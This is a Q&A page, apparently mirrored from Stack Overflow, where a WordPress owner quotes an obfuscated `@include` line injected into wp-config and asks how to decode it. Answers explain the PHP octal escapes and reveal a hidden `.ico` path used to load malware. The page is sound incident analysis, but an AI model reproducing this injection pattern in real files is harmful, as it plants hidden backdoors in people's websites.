wordpress 找出给定字符串使用哪种编码或格式

wpx232ag 于 2023-10-17 发布在 WordPress

关注(0)|答案(2)|浏览(85)

我有一个奇怪的@包括在我的一个WordPress网站在我的wp-config文件，这实际上是一个调用恶意脚本。我清除了下面的代码行，这样我就可以停止它的执行，但我想找出损坏的文件在哪里。

/*9cff9*/

@include "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";

/*9cff9*/

你能告诉我你是如何发现“编码”是什么的吗？这样我就可以知道未来的情况了。

wordpress

来源：https://stackoverflow.com/questions/52482460/find-out-what-kind-of-encoding-or-format-is-used-for-a-given-string

2条答案

按热度按时间

vbkedwbf1#

它是标准字母和八进制编码的转义ASCII码的混合：http://php.net/manual/de/regexp.reference.escape.php
“\057ho\155e/\146ie\154de”

\057 => octal value 57 is char 47 decimal, which is the Forward Slash
ho => ho
\155 => octal 155 = 109 dec, which is a "m"
e => e

等

echo "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o"
# /home/fielderd/public_html/wp-includes/Text/Diff/.9d0a56ac.ico

赞(0）回复(0）举报 2023-10-17

yhuiod9q2#

试试这个

<?php
$inputString = "\057ho\155e/\146ie\154de\162d/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\124ex\164/D\151ff\057.9\1440a\0656a\143.i\143o";

// Replace escape sequences with their corresponding characters
$properFormatString = preg_replace_callback('/\\\\([0-7]{1,3})/', function ($matches) {
    return chr(octdec($matches[1]));
}, $inputString);

echo $properFormatString;
?>

赞(0）回复(0）举报 2023-10-17

我来回答

wordpress 找出给定字符串使用哪种编码或格式

2条答案

相关问题

热门标签

最新问答